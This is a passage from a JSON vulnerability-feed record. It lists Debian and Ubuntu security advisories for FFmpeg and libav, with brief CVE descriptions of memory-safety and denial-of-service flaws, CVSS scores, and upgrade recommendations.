"href": "https://advisories.mageia.org/MGASA-2018-0319.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2022-02-17T11:32:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4722-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJuly 08, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ffmpeg\nCVE ID : CVE-2019-13390 CVE-2019-17539 CVE-2019-17542\n CVE-2020-12284 CVE-2020-13904\n\nSeveral vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 7:4.1.6-1~deb10u1.\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-08T20:46:11", "type": "debian", "title": "[SECURITY] [DSA 4722-1] ffmpeg security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13390", "CVE-2019-17539", "CVE-2019-17542", "CVE-2020-12284", "CVE-2020-13904"], "modified": "2020-07-08T20:46:11", "id": "DEBIAN:DSA-4722-1:82DDB", "href": "https://lists.debian.org/debian-security-announce/2020/msg00127.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T11:19:54", "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2291-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ \nJuly 27, 2020 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : ffmpeg\nVersion : 7:3.2.15-0+deb9u1\nCVE ID : CVE-2019-13390 CVE-2019-17542 CVE-2020-13904\nDebian Bug : \n\nSeveral vulnerabilities have been fixed by upgrading FFmpeg,\na widely used multimedia framework, from 3.2.14 to 3.2.15.\n\nCVE-2019-13390\n\n rawenc: Only accept the appropriate stream type for raw muxers.\n\nCVE-2019-17542\n\n Heap-based buffer overflow in vqa_decode_chunk.\n\nCVE-2020-13904\n\n Use-after-free via a crafted EXTINF duration in an m3u8 file.\n\nFor Debian 9 stretch, these problems have been fixed in version\n7:3.2.15-0+deb9u1.\n\nSeveral other bugs are also fixed in 3.2.15,\na full list of changes is available at\nhttps://git.ffmpeg.org/gitweb/ffmpeg.git/blob/37a8ad9a3167923d500910031a8086489c004d83:/Changelog\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-27T09:28:37", "type": "debian", "title": "[SECURITY] [DLA 2291-1] ffmpeg security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13390", "CVE-2019-17542", "CVE-2020-13904"], "modified": "2020-07-27T09:28:37", "id": "DEBIAN:DLA-2291-1:EDF5B", "href": "https://lists.debian.org/debian-lts-announce/2020/07/msg00022.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-26T13:15:04", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4502-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nAugust 16, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ffmpeg\nCVE ID : CVE-2019-12730\n\nSeveral vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 7:4.1.4-1~deb10u1.\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-16T20:38:40", "type": "debian", "title": "[SECURITY] [DSA 4502-1] ffmpeg security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12730"], "modified": "2019-08-16T20:38:40", "id": "DEBIAN:DSA-4502-1:2AB9C", "href": "https://lists.debian.org/debian-security-announce/2019/msg00150.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-23T19:05:48", "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2537-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Roberto C. S\u00e1nchez\nJanuary 31, 2021 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : ffmpeg\nVersion : 7:3.2.15-0+deb9u2\nCVE ID : CVE-2019-17539 CVE-2020-35965\nDebian Bug : 979999\n\nTwo vulnerabilities have been discovered in ffmpeg, a widely used\nmultimedia framework.\n\nCVE-2019-17539\n\n a NULL pointer dereference and possibly unspecified other impact\n when there is no valid close function pointer\n\nCVE-2020-35965\n\n an out-of-bounds write because of errors in calculations of when to\n perform memset zero operations\n\nFor Debian 9 stretch, these problems have been fixed in version\n7:3.2.15-0+deb9u2.\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: PGP signature\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-31T05:06:50", "type": "debian", "title": "[SECURITY] [DLA 2537-1] ffmpeg security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17539", "CVE-2020-35965"], "modified": "2021-01-31T05:06:50", "id": "DEBIAN:DLA-2537-1:1C8E4", "href": "https://lists.debian.org/debian-lts-announce/2021/01/msg00026.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-18T23:54:27", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4249-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJuly 17, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ffmpeg\nCVE ID : CVE-2018-6392 CVE-2018-6621 CVE-2018-7557 CVE-2018-10001 \n CVE-2018-12458 CVE-2018-13300 CVE-2018-13302\n\nSeveral vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\n\t\t \nFor the stable distribution (stretch), these problems have been fixed in\nversion 7:3.2.11-1~deb9u1.\n\nWe recommend that you upgrade your ffmpeg packages.\n\nFor the detailed security status of ffmpeg please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/ffmpeg\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-17T20:41:47", "type": "debian", "title": "[SECURITY] [DSA 4249-1] ffmpeg security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10001", "CVE-2018-12458", "CVE-2018-13300", "CVE-2018-13302", "CVE-2018-6392", "CVE-2018-6621", "CVE-2018-7557"], "modified": "2018-07-17T20:41:47", "id": "DEBIAN:DSA-4249-1:09206", "href": "https://lists.debian.org/debian-security-announce/2018/msg00178.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T11:50:06", "description": "Package : libav\nVersion : 6:11.12-1~deb8u9\nCVE ID : CVE-2017-17127 CVE-2017-18245 CVE-2018-19128 CVE-2018-19130 \n CVE-2019-14443 CVE-2019-17542\n\n\nSeveral security issues were fixed in libav, a multimedia library for\nprocessing audio and video files.\n\nCVE-2017-17127\n\n The vc1_decode_frame function in libavcodec/vc1dec.c allows remote\n attackers to cause a denial of service (NULL pointer dereference\n and application crash) via a crafted file.\n CVE-2018-19130 is a duplicate of this vulnerability.\n\nCVE-2017-18245\n\n The mpc8_probe function in libavformat/mpc8.c allows remote\n attackers to cause a denial of service (heap-based buffer\n over-read) via a crafted audio file on 32-bit systems.\n\nCVE-2018-19128\n\n Heap-based buffer over-read in decode_frame in libavcodec/lcldec.c\n allows an attacker to cause denial-of-service via a crafted avi\n file.\n\nCVE-2019-14443\n\n Division by zero in range_decode_culshift in libavcodec/apedec.c\n allows remote attackers to cause a denial of service (application\n crash), as demonstrated by avconv.\n\nCVE-2019-17542\n\n Heap-based buffer overflow in vqa_decode_chunk because of an\n out-of-array access in vqa_decode_init in libavcodec/vqavideo.c.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n6:11.12-1~deb8u9.\n\nWe recommend that you upgrade your libav packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-05T18:48:56", "type": "debian", "title": "[SECURITY] [DLA 2021-1] libav security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17127", "CVE-2017-18245", "CVE-2018-19128", "CVE-2018-19130", "CVE-2019-14443", "CVE-2019-17542"], "modified": "2019-12-05T18:48:56", "id": "DEBIAN:DLA-2021-1:97C0E", "href": "https://lists.debian.org/debian-lts-announce/2019/12/msg00003.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-16T15:15:52", "description": "Package : libav\nVersion : 6:11.12-1~deb8u4\nCVE ID : CVE-2017-9993 CVE-2017-9994 CVE-2017-14055\n CVE-2017-14056 CVE-2017-14057 CVE-2017-14170\n CVE-2017-14171 CVE-2017-14767 CVE-2017-15672\n CVE-2017-17130 CVE-2018-6621 CVE-2018-7557\n CVE-2018-14394 CVE-2018-1999010\n\nSeveral security vulnerabilities were corrected in the libav\nmultimedia library which may lead to a denial-of-service, information\ndisclosure or the execution of arbitrary code if a malformed file is\nprocessed.\n\n\nCVE-2017-9993\n\n Libav does not properly restrict HTTP Live Streaming filename\n extensions and demuxer names, which allows attackers to read\n arbitrary files via crafted playlist data.\n\nCVE-2017-9994\n\n libavcodec/webp.c in Libav does not ensure that pix_fmt is set,\n which allows remote attackers to cause a denial of service\n (heap-based buffer overflow and application crash) or possibly have\n unspecified other impact via a crafted file, related to the\n vp8_decode_mb_row_no_filter and pred8x8_128_dc_8_c functions.\n\nCVE-2017-14055\n\n Denial-of-service in mv_read_header() due to lack of an EOF (End of\n File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14056\n\n Denial-of-service in rl2_read_header() due to lack of an EOF\n (End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14057\n\n Denial-of-service in asf_read_marker() due to lack of an EOF\n (End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14170\n\n Denial-of-service in mxf_read_index_entry_array() due to lack of an\n EOF (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14171\n\n Denial-of-service in nsv_parse_NSVf_header() due to lack of an EOF\n (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14767\n\n The sdp_parse_fmtp_config_h264 function in\n libavformat/rtpdec_h264.c mishandles empty sprop-parameter-sets\n values, which allows remote attackers to cause a denial of service\n (heap buffer overflow) or possibly have unspecified other impact via\n a crafted sdp file.\n\nCVE-2017-15672\n\n The read_header function in libavcodec/ffv1dec.c allows remote\n attackers to have unspecified impact via a crafted MP4 file, which\n triggers an out-of-bounds read.\n\nCVE-2017-17130\n\n The ff_free_picture_tables function in libavcodec/mpegpicture.c\n allows remote attackers to cause a denial of service\n (heap-based buffer overflow and application crash) or possibly have\n unspecified other impact via a crafted file, related to\n vc1_decode_i_blocks_adv.\n\nCVE-2018-6621\n\n The decode_frame function in libavcodec/utvideodec.c in Libav allows\n remote attackers to cause a denial of service (out of array read)\n via a crafted AVI file.\n\nCVE-2018-7557\n\n The decode_init function in libavcodec/utvideodec.c in\n Libav allows remote attackers to cause a denial of service\n (Out of array read) via an AVI file with crafted dimensions within\n chroma subsampling data.\n\nCVE-2018-14394\n\n libavformat/movenc.c in Libav allows attackers to cause a\n denial of service (application crash caused by a divide-by-zero\n error) with a user crafted Waveform audio file.\n\nCVE-2018-1999010\n\n Libav contains multiple out of array access vulnerabilities in the\n mms protocol that can result in attackers accessing out of bound\n data.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n6:11.12-1~deb8u4.\n\nWe recommend that you upgrade your libav packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-07T22:34:48", "type": "debian", "title": "[SECURITY] [DLA 1630-1] libav security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14055", "CVE-2017-14056", "CVE-2017-14057", "CVE-2017-14170", "CVE-2017-14171", "CVE-2017-14767", "CVE-2017-15672", "CVE-2017-17130", "CVE-2017-9993", "CVE-2017-9994", "CVE-2018-14394", "CVE-2018-1999010", "CVE-2018-6621", "CVE-2018-7557"], "modified": "2019-01-07T22:34:48", "id": "DEBIAN:DLA-1630-1:CC820", "href": "https://lists.debian.org/debian-lts-announce/2019/01/msg00006.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T13:17:01", "description": "Package : libav\nVersion : 6:11.12-1~deb8u4\nCVE ID : CVE-2017-9993 CVE-2017-9994 CVE-2017-14055\n CVE-2017-14056 CVE-2017-14057 CVE-2017-14170\n CVE-2017-14171 CVE-2017-14767 CVE-2017-15672\n CVE-2017-17130 CVE-2018-6621 CVE-2018-7557\n CVE-2018-14394 CVE-2018-1999010\n\nSeveral security vulnerabilities were corrected in the libav\nmultimedia library which may lead to a denial-of-service, information\ndisclosure or the execution of arbitrary code if a malformed file is\nprocessed.\n\n\nCVE-2017-9993\n\n Libav does not properly restrict HTTP Live Streaming filename\n extensions and demuxer names, which allows attackers to read\n arbitrary files via crafted playlist data.\n\nCVE-2017-9994\n\n libavcodec/webp.c in Libav does not ensure that pix_fmt is set,\n which allows remote attackers to cause a denial of service\n (heap-based buffer overflow and application crash) or possibly have\n unspecified other impact via a crafted file, related to the\n vp8_decode_mb_row_no_filter and pred8x8_128_dc_8_c functions.\n\nCVE-2017-14055\n\n Denial-of-service in mv_read_header() due to lack of an EOF (End of\n File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14056\n\n Denial-of-service in rl2_read_header() due to lack of an EOF\n (End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14057\n\n Denial-of-service in asf_read_marker() due to lack of an EOF\n (End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14170\n\n Denial-of-service in mxf_read_index_entry_array() due to lack of an\n EOF (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14171\n\n Denial-of-service in nsv_parse_NSVf_header() due to lack of an EOF\n (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14767\n\n The sdp_parse_fmtp_config_h264 function in\n libavformat/rtpdec_h264.c mishandles empty sprop-parameter-sets\n values, which allows remote attackers to cause a denial of service\n (heap buffer overflow) or possibly have unspecified other impact via\n a crafted sdp file.\n\nCVE-2017-15672\n\n The read_header function in libavcodec/ffv1dec.c allows remote\n attackers to have unspecified impact via a crafted MP4 file, which\n triggers an out-of-bounds read.\n\nCVE-2017-17130\n\n The ff_free_picture_tables function in libavcodec/mpegpicture.c\n allows remote attackers to cause a denial of service\n (heap-based buffer overflow and application crash) or possibly have\n unspecified other impact via a crafted file, related to\n vc1_decode_i_blocks_adv.\n\nCVE-2018-6621\n\n The decode_frame function in libavcodec/utvideodec.c in Libav allows\n remote attackers to cause a denial of service (out of array read)\n via a crafted AVI file.\n\nCVE-2018-7557\n\n The decode_init function in libavcodec/utvideodec.c in\n Libav allows remote attackers to cause a denial of service\n (Out of array read) via an AVI file with crafted dimensions within\n chroma subsampling data.\n\nCVE-2018-14394\n\n libavformat/movenc.c in Libav allows attackers to cause a\n denial of service (application crash caused by a divide-by-zero\n error) with a user crafted Waveform audio file.\n\nCVE-2018-1999010\n\n Libav contains multiple out of array access vulnerabilities in the\n mms protocol that can result in attackers accessing out of bound\n data.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n6:11.12-1~deb8u4.\n\nWe recommend that you upgrade your libav packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-07T22:34:48", "type": "debian", "title": "[SECURITY] [DLA 1630-1] libav security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14055", "CVE-2017-14056", "CVE-2017-14057", "CVE-2017-14170", "CVE-2017-14171", "CVE-2017-14767", "CVE-2017-15672", "CVE-2017-17130", "CVE-2017-9993", "CVE-2017-9994", "CVE-2018-14394", "CVE-2018-1999010", "CVE-2018-6621", "CVE-2018-7557"], "modified": "2019-01-07T22:34:48", "id": "DEBIAN:DLA-1630-1:21B96", "href": "https://lists.debian.org/debian-lts-announce/2019/01/msg00006.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:30:41", "description": "In FFmpeg 4.1.3, there is a division by zero at adx_write_trailer in\nlibavformat/rawenc.c.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-07-07T00:00:00", "type": "ubuntucve", "title": "CVE-2019-13390", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13390"], "modified": "2019-07-07T00:00:00", "id": "UB:CVE-2019-13390", "href": "https://ubuntu.com/security/CVE-2019-13390", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-22T21:30:42", "description": "block_cmp() in libavcodec/zmbvenc.c in FFmpeg 4.1.3 has a heap-based buffer\nover-read.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[msalvatore](<https://launchpad.net/~msalvatore>) | \"The buffer overflow is a regression since http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=0321370601833f4ae47e8e11c44570ea4bd382a4\"\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-05T00:00:00", "type": "ubuntucve", "title": "CVE-2019-13312", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13312"], "modified": "2019-07-05T00:00:00", "id": "UB:CVE-2019-13312", "href": "https://ubuntu.com/security/CVE-2019-13312", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:31:04", "description": "aa_read_header in libavformat/aadec.c in FFmpeg before 3.2.14 and 4.x\nbefore 4.1.4 does not check for sscanf failure and consequently allows use\nof uninitialized variables.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-04T00:00:00", "type": "ubuntucve", "title": "CVE-2019-12730", "bulletinFamily": "info", 